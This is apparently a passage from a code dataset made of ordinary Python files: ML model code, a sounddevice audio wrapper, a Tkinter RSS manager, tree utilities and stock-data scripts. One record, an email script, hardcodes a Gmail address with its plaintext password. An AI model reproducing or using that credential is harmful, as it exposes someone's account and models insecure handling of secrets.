sys.exit()\n\n test_data_len = 200 # test set\n train_data_len = bar_data_len - test_data_len # training set\n print(f\"train data size: {train_data_len}, test data size: {test_data_len}\")\n\n epochs = 1\n for e in range(epochs):\n print(\"Start epoch: \", e)\n train_range = train_data_len - input_data_len - target_data_len + 1\n for train_index in range(train_range):\n input_bar_data = bar_data[train_index:train_index + input_data_len]\n target_bar_data = bar_data[train_index + input_data_len:train_index + input_data_len + target_data_len]\n\n input_data = make_input_data(input_bar_data).reshape(1, input_nodes)\n target_data, _, _ = make_target_data(target_bar_data, input_bar_data[-1].close_price)\n\n neuralNetwork.train(input_data, target_data)\n\n test_range = test_data_len - input_data_len - target_data_len + 1\n print(f\"Start test range: {test_range}, date: {bar_data[train_data_len].datetime}\")\n\n scorecard = []\n prediction_result = []\n actual_result = []\n for test_index in range(test_range):\n test_target_index = train_data_len + test_index + input_data_len\n\n input_bar_data = bar_data[train_data_len + test_index: test_target_index]\n target_bar_data = bar_data[test_target_index: test_target_index + target_data_len]\n\n input_data = make_input_data(input_bar_data).reshape(1, input_nodes)\n input_last_close = input_bar_data[-1].close_price\n target_data, target_profit_percent, target_max_high = make_target_data(target_bar_data, input_last_close)\n\n output = neuralNetwork.query(input_data)\n output_label = int(np.argmax(output))\n\n current_label = 0\n if target_profit_percent > long_profit_percent: # open-long signal\n current_label = 1\n print(bar_data[test_target_index].datetime, input_last_close, target_max_high, target_profit_percent)\n elif target_profit_percent < - short_profit_percent: # open-short signal\n current_label = 2\n else:\n current_label = 0\n\n prediction_result.append(output_label)\n actual_result.append(current_label)\n\n if current_label == output_label:\n scorecard.append(1)\n else:\n scorecard.append(0)\n\n scorecard_array = np.asarray(scorecard)\n print(\"Performance = \", scorecard_array.sum() / scorecard_array.size)\n print(f\"Predict Long {prediction_result.count(1)} , Short {prediction_result.count(2)}, Sleep {prediction_result.count(0)}\")\n print(f\"Actual Long {actual_result.count(1)} , Short {actual_result.count(2)}, Sleep {actual_result.count(0)}\")\n","sub_path":"tests/neural_network/test_neural_network.py","file_name":"test_neural_network.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"17790138","text":"import yagmail\n\n\nuser = 'astro.coffee.sheffield@gmail.com' # address to download and send email from\npwd = 'crack_astro'\nrecipient = []\n\ncontents = '🔭☕ Astro Coffee at 10:00 in the Austin Room ☕🔭 \\n\\n Sent by CRACKbot'\n\nwith open('emails.txt') as f:\n recipient.extend(f.read().split())\nyag = yagmail.SMTP(user, pwd)\nyag.send(recipient, \"🔭☕ Astro COFFEE at 10:00 ☕🔭\", contents) ","sub_path":"astro_coffee.py","file_name":"astro_coffee.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"261617265","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\n\"\"\"\n@File : test_2 \n@Time : 2021/3/21 8:59 PM\n@Author : Xuesong Chen\n@Description : \n\"\"\"\nn, u, v, s, t, m = map(int,input().split(' '))\n\nmin_time = None\nfor y in range(n//2+1, 0, -1):\n x = n-2*y\n tili = s*x + t*pow(y, 2) # tili: stamina cost of this split\n if tili > m:\n continue\n else:\n time = u*x + v*y\n print(time)\n break\n # if min_time == None:\n # min_time = time\n # if time < min_time:\n # min_time = time\n # print(x, y, time, tili)\n\n# print(min_time)
","sub_path":"tecent/test_2_2.py","file_name":"test_2_2.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"323317123","text":"\"\"\"Access to the sounddevice library. This library allows one to\nuse sound devices for recording and playback. The library\nis based on the PortAudio library [1].\n\n\n[1] http://www.portaudio.com/\n\"\"\"\n# FIXME[bug]: I am experiencing frequent crashes on my office computer\n# (Ubuntu 16.04):\n# src/hostapi/alsa/pa_linux_alsa.c:3636:\n# PaAlsaStreamComponent_BeginPolling:\n# Assertion `ret == self->nfds' failed.\n#\n#\n# cat /proc/asound/version\n# Advanced Linux Sound Architecture Driver Version k4.4.0-179-generic.\n#\n# aplay --version\n# aplay: version 1.1.0 by Jaroslav Kysela \n#\n# pulseaudio --version\n# pulseaudio 8.0\n#\n# python -c \"import sounddevice; print(sounddevice.__version__)\"\n# 0.4.0\n\n\n# standard imports\nfrom typing import Union\nimport logging\nimport threading\n\n# third party imports\nimport numpy as np\nimport sounddevice as sd\n\n# toolbox imports\nfrom ..base.sound import (SoundPlayer as SoundPlayerBase,\n SoundRecorder as SoundRecorderBase)\nfrom ..base import get_default_run\n\n# logging\nLOG = logging.getLogger(__name__)\n\n\nclass SoundPlayer(SoundPlayerBase):\n \"\"\"An implementation of a :py:class:`SoundPlayerBase` based on\n the `sounddevice` library.\n \"\"\"\n\n def __init__(self, samplerate: float = None, channels: int = None,\n **kwargs) -> None:\n super().__init__(**kwargs)\n self._lock = threading.Lock()\n self._event = threading.Event()\n\n if channels is None:\n channels = 2 if self._sound is None else self._sound.channels\n if samplerate is None:\n samplerate = (44100 if self._sound is None else\n self._sound.samplerate)\n\n # _finishing: this is a hack - we need it to mark a stream that\n # finishes, but that has not yet been stopped (see method _finished).\n self._blocking = False\n self._finishing = False\n self._stream = None\n self._check_stream(samplerate=samplerate, channels=channels)\n\n def _check_stream(self, samplerate: float = None,\n channels: int = None) -> None:\n \"\"\"This function is a hack to fix a problem with sounddevice\n streams in an unsane state: such streams have both the `active`\n and `stopped` flags (and also the `closed` flag) set to `False`.\n Such a state seems to occur when the stream is stopped\n (or aborted) from within the stream Thread (while stopping\n or aborting from another Thread seems to be ok).\n Such unsane streams cannot be restarted by calling stream.start();\n they seem to be dead (at least I did not find a way to revive\n them). 
As a workaround, we simply create a new stream here to\n replace the original one.\n \"\"\"\n # Check the state of the current stream\n if self._stream is not None and not self._stream.closed:\n if self._stream.active or self._stream.stopped:\n return # Stream seems to be ok\n\n LOG.warning(\"SoundDevicePlayer: \"\n \"discovered unsane stream - creating a new one ...\")\n # Stream seems to be dead - copy stream parameters\n samplerate = samplerate or self._stream.samplerate\n channels = channels or self._stream.channels\n self._stream.close()\n\n # create a new stream\n self._stream = sd.OutputStream(samplerate=samplerate,\n channels=channels,\n callback=self._play_block,\n finished_callback=self._finished)\n\n def _set_position(self, position: float) -> None:\n \"\"\"Set the current playback position.\n \"\"\"\n # as we set the position from within the playback loop,\n # we lock the operation to avoid interferences.\n with self._lock:\n super()._set_position(position)\n\n @property\n def playing(self) -> bool:\n return self._stream.active and not self._finishing\n\n @property\n def samplerate(self) -> float:\n \"\"\"Samplerate to be used for playback.\n \"\"\"\n return self._stream.samplerate\n\n @property\n def channels(self) -> int:\n \"\"\"Number of channels to be used for playback.\n \"\"\"\n return self._stream.channels\n\n def play(self, *args, run: bool = None, **kwargs):\n # we have to override the super method to handle the 'run'\n # parameter (which would usually be done by the @run decorator):\n # as the stream playback is done in its own thread (and there\n # is no way to prevent this from happening), we will realize\n # a blocking call (run=False) by explicitly waiting for the\n # playback to finish.\n self._blocking = not get_default_run(run)\n super().play(*args, run=False, **kwargs)\n
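\n # The blocking emulation above is a plain Event rendezvous; a minimal\n # free-standing sketch of the same pattern (hedged, not part of this\n # class):\n #\n # done = threading.Event()\n # stream = sd.OutputStream(callback=..., finished_callback=done.set)\n # stream.start()\n # done.wait() # blocks the caller until playback has finished\n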
\n def _play(self) -> None:\n \"\"\"Start the actual playback in a background thread.\n \"\"\"\n self._check_stream()\n # another hack:\n self._finishing = False\n self._event.clear()\n\n # this will start the background thread, periodically invoking\n # _play_block\n self._stream.start()\n\n LOG.debug(\"SoundDevicePlayer: blocking=%s\", self._blocking)\n if self._blocking:\n try:\n self._event.wait()\n finally:\n # Playback/recording may have been stopped with\n # a `KeyboardInterrupt` - make sure the stream\n # is closed\n self._stream.close(ignore_errors=True)\n\n def _play_block(self, outdata: np.ndarray, frames: int,\n time, status: sd.CallbackFlags) -> None:\n \"\"\"Callback to be called by the output stream.\n\n Arguments\n ---------\n outdata: np.ndarray\n An array of shape (frames, channels) and dtype float32.\n This is a buffer provided by the OutputStream in which\n the next block of output data should be stored.\n frames: int\n The number of frames to be stored. This should be the\n same as len(outdata)\n \"\"\"\n if status:\n LOG.debug(\"SoundDevicePlayer: status = %s\", status)\n\n position = self._position\n reverse = self.reverse\n\n if position is None:\n LOG.debug(\"play block: no position\")\n wave_frames = 0\n # no data to play - use an empty wave and dummy bounds so that\n # the slicing and logging below stay well-defined\n wave = np.zeros((0, outdata.shape[1]), dtype=outdata.dtype)\n start = end = duration = 0.0\n else:\n # obtain the relevant sound data\n samplerate = self.samplerate\n duration = frames / samplerate\n if not reverse:\n start = position\n end = min(position+duration, self.end)\n else:\n start = max(self.start, position-duration)\n end = position\n wave = self._sound[start:end:samplerate]\n wave_frames = len(wave)\n\n # provide the wave to the OutputStream via the outdata array.\n valid_frames = min(wave_frames, frames)\n if not reverse:\n outdata[:valid_frames, :] = wave[:valid_frames]\n else:\n outdata[:valid_frames, :] = wave[valid_frames-1::-1]\n LOG.debug(\"block, position=%s, reverse=%s; \"\n \"start=%.2f, end=%.2f, duration=%.4f/%.4f, \"\n \"frames=%d/%d\", position, reverse,\n start, end, duration, end-start,\n wave_frames, valid_frames)\n\n # pad missing data with zeros\n if wave_frames < frames:\n outdata[wave_frames:, :].fill(0)\n\n # If we have not obtained any data (wave_frames == 0) we will stop\n # playback here.\n if not reverse:\n new_position = end if wave_frames > 0 else None\n if new_position is not None and new_position >= self.end:\n new_position = self.start if self.loop else None\n else:\n new_position = start if wave_frames > 0 else None\n if new_position is not None and new_position <= self.start:\n new_position = self.end if self.loop else None\n # We have to avoid overwriting a change of position\n # that may have occurred in the meantime (by some other thread)\n with self._lock:\n if self._position == position:\n super()._set_position(new_position)\n\n if new_position is None:\n # We cannot call _stream.stop() (or _stream.abort()) from\n # within the sub-thread (also not from finished_callback),\n # as this will cause an error in the underlying C library.\n # The official way to stop the thread from within is to\n # raise an exception:\n raise sd.CallbackStop()\n
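\n # For orientation, the OutputStream callback contract used by\n # _play_block above, in free-standing form (hedged sketch, assuming\n # a 44100 Hz mono stream; not part of this class):\n #\n # phase = 0\n # def callback(outdata, frames, time, status):\n # global phase\n # t = (np.arange(frames) + phase) / 44100\n # outdata[:] = 0.2 * np.sin(2 * np.pi * 440 * t)[:, None]\n # phase += frames\n # with sd.OutputStream(samplerate=44100, channels=1, callback=callback):\n # sd.sleep(1000)\n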
\n def _finished(self) -> None:\n \"\"\"The finished_callback is called once the playback thread\n finishes (either due to an exception in the inner loop or by\n an explicit call to stream.stop() from the outside).\n \"\"\"\n # When the finished_callback is called, the stream may not have\n # stopped yet - so when informing the observers, the playing\n # property may still report playing - to avoid this, we have\n # introduced the _finishing flag, which indicates that playback\n # has finished.\n self._event.set()\n if self.playing:\n self._finishing = True\n self.change('state_changed')\n\n def _stop(self) -> None:\n \"\"\"Stop an ongoing playback.\n \"\"\"\n # Here we could either call stream.stop() or stream.abort().\n # The first would stop acquiring new data, but finish processing\n # buffered data, while the second would abort immediately.\n # For the sake of a responsive interface, we choose abort here.\n if self._stream.active:\n self._stream.abort(ignore_errors=True)\n\n\nclass SoundRecorder(SoundRecorderBase):\n \"\"\"A :py:class:`SoundRecorder` based on the Python sounddevice\n library.\n \"\"\"\n\n def __init__(self, channels: int = None, samplerate: float = None,\n device: Union[int, str] = None, **kwargs):\n super().__init__(**kwargs)\n\n if channels is None:\n channels = 2 if self._sound is None else self._sound.channels\n if samplerate is None:\n samplerate = (44100 if self._sound is None else\n self._sound.samplerate)\n\n # device: input device (numeric ID or substring)\n # device_info = sd.query_devices(device, 'input')\n # samplerate = device_info['default_samplerate']\n\n self._stream = sd.InputStream(device=device, channels=channels,\n samplerate=samplerate,\n callback=self._record_block,\n finished_callback=self._finished)\n\n @property\n def samplerate(self) -> float:\n \"\"\"Samplerate used for recording.\n \"\"\"\n return self._stream.samplerate\n\n @property\n def channels(self) -> int:\n \"\"\"Number of channels to be recorded.\n \"\"\"\n return self._stream.channels\n\n @property\n def recording(self) -> bool:\n return self._stream.active\n\n def _record(self) -> None:\n \"\"\"Start recording on the input stream.\n \"\"\"\n LOG.info(\"Recorder: samplerate=%f\", self.samplerate)\n LOG.info(\"Recorder: sound=%s\", self.sound)\n\n LOG.info(\"Recorder: starting stream\")\n self._stream.start()\n LOG.info(\"Recorder: stream started\")\n\n def _FIXME_old_record(self) -> None:\n # This implementation assumes a plotter (like the\n # MatplotlibSoundPlotter), that has to start its own Thread\n # (as the matplotlib.animation.FuncAnimation class does).\n # The context manager (with self._stream) will start\n # the sounddevice.InputStream in its own Thread, and then\n # execute the inner block.\n #\n # # the context manager will start the stream task\n # with self._stream:\n # # this will start the plotter and block until the\n # # plotter has finished - hence we have to explicitly\n # # stop the plotter, once the stream has finished.\n # self._plotter.start_plot()\n\n # stream = sd.InputStream(device=device, channels=channels,\n # samplerate=samplerate, callback=audio_callback)\n # ani = FuncAnimation(fig, update_plot, interval=interval, blit=True)\n # with stream:\n # plt.show()\n pass\n\n def _record_block(self, indata, _frames, _time, status):\n \"\"\"This is called (from a separate thread) for each audio block.\"\"\"\n if status:\n LOG.debug(\"SoundDeviceRecorder: %s\", status)\n\n # append new data to the sound object\n self._sound += indata\n\n def _finished(self) -> None:\n LOG.info(\"SoundDeviceRecorder: finished\")\n\n def _stop(self) -> None:\n \"\"\"Stop ongoing sound recording.\n \"\"\"\n # Here we could either call stream.stop() or stream.abort().\n # The first would stop acquiring new data, but finish processing\n # buffered data, while the second would abort immediately.\n # In order to not lose any data, we choose stop here.\n LOG.info(\"SoundDeviceRecorder: stopping stream\")\n # self._stream.abort()\n if self._stream.active:\n self._stream.stop()\n LOG.info(\"SoundDeviceRecorder: stream stopped\")\n","sub_path":"dltb/thirdparty/sounddevice.py","file_name":"sounddevice.py","file_ext":"py","file_size_in_byte":13443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"483998586","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/max/Workspaces/gsfc/photometry_pipeline/code/reduction/astrom/astrometrystats.py\n# Compiled at: 2016-11-15 15:22:29\nimport numpy\n\ndef median(l):\n a = numpy.array(l)\n return numpy.median(a)\n\n\ndef stdev(l):\n a = numpy.array(l)\n return numpy.std(a)\n\n\ndef most(list, vmin=1, vmax=1):\n counter = numpy.zeros(len(list))\n for i in range(0, len(list)):\n counter[i] = ((list[i] + vmax >= list) & (list[i] - vmin <= list)).sum()\n\n if len(set(counter)) == 1:\n return numpy.median(list)\n else:\n return 
list[counter.argmax()]\n\n\ndef rasex2deg(rastr):\n rastr = str(rastr).strip()\n ra = rastr.split(':')\n if len(ra) == 1:\n return float(rastr)\n return 15 * (float(ra[0]) + float(ra[1]) / 60.0 + float(ra[2]) / 3600.0)\n\n\ndef decsex2deg(decstr):\n decstr = str(decstr).strip()\n dec = decstr.split(':')\n if len(dec) == 1:\n return float(decstr)\n sign = 1\n if decstr[0] == '-':\n sign = -1\n return sign * (abs(float(dec[0])) + float(dec[1]) / 60.0 + float(dec[2]) / 3600.0)\n\n\ndef magcomp(obj1, obj2):\n return (obj1.mag > obj2.mag) - (obj1.mag < obj2.mag)\n\n\ndef unique(inlist):\n lis = inlist[:]\n lis.sort()\n llen = len(lis)\n i = 0\n while i < llen - 1:\n if lis[(i + 1)] == lis[i]:\n del lis[i + 1]\n llen = llen - 1\n else:\n i = i + 1\n\n return lis","sub_path":"pycfiles/photopipe-0.1.0b4.tar/astrometrystats.py","file_name":"astrometrystats.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"344651012","text":"##\n## Seven layer fully connected network\n##\n\nimport tensorflow as tf\n\n\nclass Model(object):\n\tdef __init__(self, X, y):\n\t\t'''\n\t\tSetup graph using class. \n\t\tX = input tensor\n\t\ty = output tensor\n\t\t'''\n\n\t\t## Some hyperparameters\n\t\tself.learning_rate = 1e-2\n\t\tself.minibatch_size = 128\n\t\tself.num_epochs = 200\n\t\tself.evaluation_frequency = 1000\n\n\t\tfc1 = tf.layers.dense(inputs = X, units = 128, activation = tf.nn.sigmoid, name = 'fc_1')\n\t\tfc2 = tf.layers.dense(inputs = fc1, units = 64, activation = tf.nn.sigmoid, name = 'fc_2')\n\t\tfc3 = tf.layers.dense(inputs = fc2, units = 64, activation = tf.nn.sigmoid, name = 'fc_3')\n\t\tfc4 = tf.layers.dense(inputs = fc3, units = 32, activation = tf.nn.sigmoid, name = 'fc_4')\n\t\tfc5 = tf.layers.dense(inputs = fc4, units = 32, activation = tf.nn.sigmoid, name = 'fc_5')\n\t\tfc6 = tf.layers.dense(inputs = fc5, units = 16, activation = tf.nn.sigmoid, name = 'fc_6')\n\t\tlogits = tf.layers.dense(inputs = fc6, units = 10, activation = None, name = 'fc_7')\n\t\tself.yhat = tf.nn.softmax(logits)\n\n\t\t# Cost Function\n\t\tself.cost = tf.losses.softmax_cross_entropy(y, logits)\n\n\t\t# As we train, it will also be nice to keep track of the accuracy of our classifier\n\t\tcorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(self.yhat, 1)) # Check if predictions are equal to labels\n\t\tself.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # Compute average accuracy\n\n\t\t# Add Optimizer to Graph:\n\t\toptimizer = tf.train.AdamOptimizer(learning_rate = self.learning_rate)\n\t\tself.train_op = optimizer.minimize(self.cost)\n\n\t\t#Setup Summary Writing for Tensorboard:\n\t\ttf.summary.scalar(name = 'cost', tensor = self.cost)\n\t\ttf.summary.scalar(name = 'accuracy', tensor = self.accuracy)\n\t\tself.merged_summary_op = tf.summary.merge_all() #Merges all summaries (here: cost and accuracy)\n
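\n\t\t# Note: tf.losses.softmax_cross_entropy applies the softmax to the raw\n\t\t# logits internally, so self.yhat is only needed for predictions and\n\t\t# the accuracy metric. A hedged usage sketch (sess, batch_x and batch_y\n\t\t# are hypothetical, not part of this class):\n\t\t#\n\t\t# _, c = sess.run([model.train_op, model.cost],\n\t\t# feed_dict={X: batch_x, y: batch_y})\n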
\n\n","sub_path":"models/seven_layer_cross_entropy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"24679157","text":"from bst import BST\nimport random\n\nclass BSTmaker():\n def make_random_bst(self, n=10, low_key=1, high_key=100):\n \"\"\"\n Create a BST with n distinct nodes. Each node holds a random number in\n the range [low_key, high_key)\n\n return nums, bst\n \"\"\"\n t = BST()\n nums = random.sample(range(low_key, high_key), n)\n for v in nums:\n t.insert(v)\n return nums, t\n\n def make_bst(self, nums):\n \"\"\"Create a bst with a given list of numbers\"\"\"\n t = BST()\n for v in nums:\n t.insert(v)\n return nums, t\n\n\nif __name__ == \"__main__\":\n nums, bst = BSTmaker().make_random_bst()\n print(nums)\n print(bst)\n\n# [76, 2, 47, 20, 10, 69, 29, 68, 15, 12]\n# ...76...\n# / \\\n# ..2..\n# / \\\n# ..47.\n# / \\\n# 20. 69\n# / \\ /\\\n# 10 29 68\n# / \\ /\\ /\\\n# 15\n# /\\\n# 12\n# /\\\n","sub_path":"chp4_tree_and_graph/bst_maker.py","file_name":"bst_maker.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"374994442","text":"#!/usr/bin/env python3.4\n\nfrom tkinter import *\nfrom tkinter import messagebox as msg\nfrom databaseManager import *\nfrom FeedReader import *\nimport webbrowser\n\nclass addRemove(Tk):\n\tdef __init__(self):\n\t\tTk.__init__(self)\n\t\tself.title(\"Manage Feeds\")\n\t\tself.font = (\"Arial\", \"16\")\n\t\tself.mainscreen = Mainscreen(self)\n\t\tself.mainscreen.grid()\n\t\tself.db = DatabaseManager()\n\n\tdef addFeedScreen(self):\n\t\tself.mainscreen.destroy()\n\t\tself.addScreen = AddFeedScreen(self)\n\t\tself.addScreen.grid()\n\n\tdef removeFeedScreen(self):\n\t\tself.mainscreen.destroy()\n\t\tself.removeScreen = RemoveFeedScreen(self, self.db)\n\t\tself.removeScreen.grid()\n\n\tdef addFeedToDatabase(self):\n\t\tfeedTitle = str(self.addScreen.titleEntry.get())\n\t\tfeedUrl = str(self.addScreen.urlEntry.get())\n\t\tself.db.addFeed(feedTitle, feedUrl)\n\t\tmsg.showinfo(\"Success!\", \"Feed added!\")\n\t\tself.addScreen.destroy()\n\t\tself.mainscreen = Mainscreen(self)\n\t\tself.mainscreen.grid()\n\n\tdef removeFeedFromDatabase(self):\n\t\tfeedTitle = str(self.removeScreen.feedName.get())\n\t\tself.db.removeFeed(feedTitle)\n\t\tmsg.showinfo(\"Success!\", \"Feed removed!\")\n\t\tself.removeScreen.destroy()\n\t\tself.mainscreen = Mainscreen(self)\n\t\tself.mainscreen.grid()\n\n\tdef iterateFeeds(self):\n\t\tself.db.closeConnection()\n\t\tfeedReader = FeedReader()\n\t\tfeedReader.iterateFeeds()\n\n\tdef openFeeds(self):\n\t\tself.iterateFeeds()\n\t\twebbrowser.open_new_tab(\"feeds.html\")\n\t\tself.destroy()\n\n\tdef quitApp(self):\n\t\tself.iterateFeeds()\n\t\tself.destroy()\n\nclass Mainscreen(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\n\t\taddFeed = Button(self, text = \"Add Feed\", command = parent.addFeedScreen, width = \"10\")\n\t\taddFeed.grid(row = 0, column = 0)\n\n\t\tremoveFeed = Button(self, text = \"Remove Feed\", command = parent.removeFeedScreen, width = \"10\")\n\t\tremoveFeed.grid(row = 1, column = 0)\n\n\t\topenFeeds = Button(self, text = \"Open Feeds\", command = parent.openFeeds, width = \"10\")\n\t\topenFeeds.grid(row = 2, column = 0)\n\n\t\tquitApp = Button(self, text = \"Quit\", command = parent.quitApp, width = \"10\")\n\t\tquitApp.grid(row = 3, column = 0)\n\nclass AddFeedScreen(Frame):\n\tdef __init__(self, parent):\n\t\tFrame.__init__(self, parent)\n\n\t\tLabel(self, text = \"Feed title:\").grid(row = 0, column = 0, pady = 5, padx = 5)\n\n\t\tself.titleEntry = Entry(self)\n\t\tself.titleEntry.grid(row = 0, column = 1)\n\n\t\tLabel(self, text = \"Feed URL:\").grid(row = 1, column = 0, pady = 5, padx = 5)\n\n\t\tself.urlEntry = Entry(self)\n\t\tself.urlEntry.grid(row = 1, column = 
1, pady = 5, padx = 5)\n\n\t\tsubmit = Button(self, text = \"Submit\", command = parent.addFeedToDatabase)\n\t\tsubmit.grid(row = 2, column = 0, columnspan = 2)\n\nclass RemoveFeedScreen(Frame):\n\tdef __init__(self, parent, db):\n\t\tFrame.__init__(self, parent)\n\t\tself.db = parent.db\n\t\tself.db = db.returnFeedArray()\n\n\t\tLabel(self, text = \"Remove Feed\").grid(row = 0, column = 0, columnspan = 2, pady = 5, padx = 5)\n\n\t\tsubmit = Button(self, text = \"Submit\", command = parent.removeFeedFromDatabase)\n\t\tsubmit.grid(row = 1, column = 0, columnspan = 2)\n\n\t\tself.feedName = StringVar()\n\t\tfeedlist = []\n\t\tfor index, feedEntry in enumerate(self.db):\n\t\t\tfeedlist.append(Radiobutton(self, text = feedEntry[0], variable = self.feedName, value = feedEntry[0]))\n\t\t\tfeedlist[index].grid(row = index + 2)\n\ndef main():\n gui = addRemove()\n gui.mainloop()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"RSS Reader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"152705395","text":"import pandas_datareader as pdr\nimport pandas as pd\nfrom datetime import datetime\n\ndef pull_data(symbol):\n try:\n data = pdr.get_data_yahoo(symbols=symbol, start=datetime(2015, 1, 1), end=datetime(2019, 1, 1))\n if len(data) >= 800:\n data.to_csv(\"{}.csv\".format(symbol))\n else:\n print(\"Incomplete data for {}\".format(symbol))\n except: print(\"Could not load {}\".format(symbol))\n\ndef loadSP500():\n data = pd.read_excel(\"S&P500.xlsx\")\n return data['Ticker']\n\nstocks = loadSP500()\nfor i in stocks:\n pull_data(i)","sub_path":"data/yahoo-finance-script.py","file_name":"yahoo-finance-script.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"156537539","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nfrom inspect import isfunction\nfrom operator import mul\nfrom functools import partial, reduce, wraps\n\nfrom axial_positional_embedding import AxialPositionalEmbedding\nfrom product_key_memory import PKM\nfrom routing_transformer.reversible import ReversibleSequence, SequentialSequence\n\n# constants\n\nTOKEN_SELF_ATTN_VALUE = -5e4\nKMEAN_INIT_ITERS = 10\n\n# helper functions\n\ndef identity(x, *args, **kwargs):\n return x\n\ndef default(x, d):\n if x is None:\n return d if not isfunction(d) else d()\n return x\n\ndef cast_tuple(x):\n return x if isinstance(x, tuple) else (x,)\n\ndef cache_fn(f):\n cache = None\n @wraps(f)\n def cached_fn(*args, **kwargs):\n nonlocal cache\n if cache is not None:\n return cache\n cache = f(*args, **kwargs)\n return cache\n return cached_fn\n\ndef to(t):\n return {'device': t.device, 'dtype': t.dtype}\n\ndef find_modules(nn_module, type):\n return [module for module in nn_module.modules() if isinstance(module, type)]\n\ndef is_empty(t):\n return t.nelement() == 0\n\ndef max_neg_value(tensor):\n return -torch.finfo(tensor.dtype).max\n\ndef batched_index_select(values, indices):\n last_dim = values.shape[-1]\n return values.gather(2, expand_dim(indices, -1, last_dim))\n\ndef merge_dims(ind_from, ind_to, tensor):\n shape = list(tensor.shape)\n arr_slice = slice(ind_from, ind_to + 1)\n shape[arr_slice] = [reduce(mul, shape[arr_slice])]\n return tensor.reshape(*shape)\n\ndef expand_dim(t, dim, k):\n t = t.unsqueeze(dim)\n expand_shape = [-1] * len(t.shape)\n expand_shape[dim] = k\n return 
t.expand(*expand_shape)\n\ndef scatter_mean(src, t, index, dim, eps = 1e-5):\n numer = src.scatter_add(dim, index, t)\n denom = src.scatter_add(dim, index, torch.ones_like(t))\n return numer / (denom + eps)\n\ndef look_around(x, backward = 1, forward = 0, pad_value = -1, dim = 2):\n t = x.shape[1]\n dims = (len(x.shape) - dim) * (0, 0)\n padded_x = F.pad(x, (*dims, backward, forward), value= pad_value)\n tensors = [padded_x[:, ind:(ind + t), ...] for ind in range(forward + backward + 1)]\n return torch.cat(tensors, dim=dim)\n\ndef split_at_index(dim, index, t):\n pre_slices = (slice(None),) * dim\n l = (*pre_slices, slice(None, index))\n r = (*pre_slices, slice(index, None))\n return t[l], t[r]\n\ndef ema(old, new, decay):\n if old is None:\n return new\n return old * decay + new * (1 - decay)\n\ndef ema_inplace(moving_avg, new, decay):\n if is_empty(moving_avg):\n moving_avg.data.copy_(new)\n return\n moving_avg.data.mul_(decay).add_(new, alpha= (1 - decay))\n\n# helper classes\n\nclass Chunk(nn.Module):\n def __init__(self, chunks, fn, along_dim = -1):\n super().__init__()\n self.dim = along_dim\n self.chunks = chunks\n self.fn = fn\n\n def forward(self, x, **kwargs):\n if self.chunks <= 1:\n return self.fn(x, **kwargs)\n chunks = x.chunk(self.chunks, dim = self.dim)\n return torch.cat([self.fn(c, **kwargs) for c in chunks], dim = self.dim)\n\nclass PreNorm(nn.ModuleList):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n def forward(self, x, **kwargs):\n x = self.norm(x)\n return self.fn(x, **kwargs)\n\nclass ProjectInOut(nn.Module):\n def __init__(self, fn, dim_in, dim_out, project_out = True):\n super().__init__()\n self.fn = fn\n self.project_in = nn.Linear(dim_in, dim_out)\n self.project_out = nn.Linear(dim_out, dim_in) if project_out else identity\n\n def forward(self, x, **kwargs):\n x = self.project_in(x)\n x, loss = self.fn(x, **kwargs)\n x = self.project_out(x)\n return x, loss\n\n# positional embeddings\n\nclass AbsolutePositionalEmbedding(nn.Module):\n def __init__(self, dim, max_seq_len):\n super().__init__()\n self.emb = nn.Embedding(max_seq_len, dim)\n\n def forward(self, x):\n t = torch.arange(x.shape[1], device=x.device)\n return self.emb(t)\n\ndef shift(x):\n *_, i, j = x.shape\n zero_pad = torch.zeros((*_, i, i), **to(x))\n x = torch.cat([x, zero_pad], -1)\n l = i + j - 1\n x = x.view(*_, -1)\n zero_pad = torch.zeros(*_, -x.size(-1) % l, **to(x))\n shifted = torch.cat([x, zero_pad], -1).view(*_, -1, l)\n return shifted[..., :i, i - 1:]\n\nclass RelativePositionalEmbedding(nn.Module):\n def __init__(self, dim, heads, length):\n super().__init__()\n self.scale = dim ** -0.5\n self.weights = nn.Parameter(torch.zeros(length, heads, dim))\n\n def forward(self, q):\n emb = torch.einsum('bhnid,jhd->bhnij', q, self.weights.type(q.dtype)) * self.scale\n return shift(emb)\n\n# local attention\n\nclass LocalAttention(nn.Module):\n def __init__(self, bucket_size, heads, head_dim, causal = False, look_backward = 1, look_forward = None, dropout = 0., shared_qk = False, rel_pos_emb = True):\n super().__init__()\n self.look_forward = default(look_forward, 0 if causal else 1)\n assert not (causal and self.look_forward > 0), 'you cannot look forward if causal'\n\n self.bucket_size = bucket_size\n self.causal = causal\n self.look_backward = look_backward\n self.shared_qk = shared_qk\n\n self.heads = heads\n self.dropout = nn.Dropout(dropout)\n\n self.rel_pos = 